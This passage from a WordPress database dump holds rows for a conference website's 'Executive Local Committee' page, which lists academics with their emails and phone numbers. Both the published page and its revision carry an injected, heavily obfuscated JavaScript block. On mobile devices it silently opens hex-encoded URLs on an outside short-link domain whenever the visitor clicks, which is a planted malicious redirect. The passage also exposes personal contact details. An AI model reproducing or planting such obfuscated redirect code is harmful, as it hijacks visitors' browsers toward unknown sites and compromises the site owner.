_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','publish','closed','closed','','executive-local-committee','','','2023-09-06 06:20:50','2023-09-06 06:20:50','',0,'https://gsw2023.com/?page_id=4849',40,'page','',0),
(4851,4,'2023-06-27 07:01:38','2023-06-27 07:01:38','[vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"100px\" image_paddings=\"15px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"66, 75\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-27 07:01:38','2023-06-27 07:01:38','',4849,'https://gsw2023.com/?p=4851',0,'revision','',0),
(4852,4,'2023-09-16 22:41:12','2023-06-27 07:02:33',' ','','','publish','closed','closed','','4852','','','2023-09-16 22:41:12','2023-09-16 22:41:12','',0,'https://gsw2023.com/?p=4852',11,'nav_menu_item','',0),
(4853,4,'2023-06-28 10:19:29','2023-06-28 10:19:29','<p>[vc_row css=\".vc_custom_1687871707649{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1687871751542{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871759816{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Chairman</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span><br />\nVice President for Post Graduate and Scientific Research<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table style=\"margin: 0px; padding: 0px;\">\n<tbody>\n<tr>\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></td>\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@gsw2023.com\"> aaelbary@gsw2023.com </a></td>\n<td style=\"width: 26%;\"><a href=\"mailto:gsw2023@aast.edu\"> gsw2023@aast.edu </a></td>\n</tr>\n<tr>\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\n<td style=\"width: 26%;\">Office: <a href=\"tel:+2035497598\">+203 5497598</a></td>\n<td style=\"width: 26%;\">Fax: <a href=\"tel:+2035497598\"> +203 5497598 </a></td>\n<td style=\"width: 26%;\">Mobile: <a href=\"tel:+201007382198\"> +20 100 7382 198 </a></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1687943626436{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687945134205{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span><br />\n<span style=\"font-size: 9pt;\"><a href=\"mailto:nashwa.elbendary@aast.edu\"> nashwa.elbendary@aast.edu </a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+201227217550 </a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"mailto:ymohasseb@aast.edu\"> ymohasseb@aast.edu </a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+ 201227217550 </a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/amira_ibrahim_zaki.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"mailto:amzak10@aast.edu</span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201006619608</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/radwa_ahmed_osman.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"mailto:radwa.ahmed@aast.edu</span><br />\n<span style=\"font-size: 12pt;\"><a 